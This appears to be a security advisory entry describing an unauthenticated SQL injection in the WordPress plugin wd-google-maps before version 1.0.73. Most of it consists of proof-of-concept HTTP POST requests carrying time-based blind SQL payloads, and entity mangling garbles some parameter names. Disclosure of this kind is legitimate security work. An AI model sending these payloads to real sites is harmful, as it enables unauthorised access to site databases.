The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
Note: /2022/12/29/map/ is page/post where the Google_Maps_WD is embed POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 85 radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)⪫=0.0&lng;=0.0&distance;_in=km POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 171 radius=1⪫=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)–+)&lng;=0.0&distance;_in=km POST /2022/12/29/map/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 171 radius=1⪫=0.0&lng;=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)–+)&distance;_in=km
CPE | Name | Operator | Version |
---|---|---|---|
wd-google-maps | lt | 1.0.73 |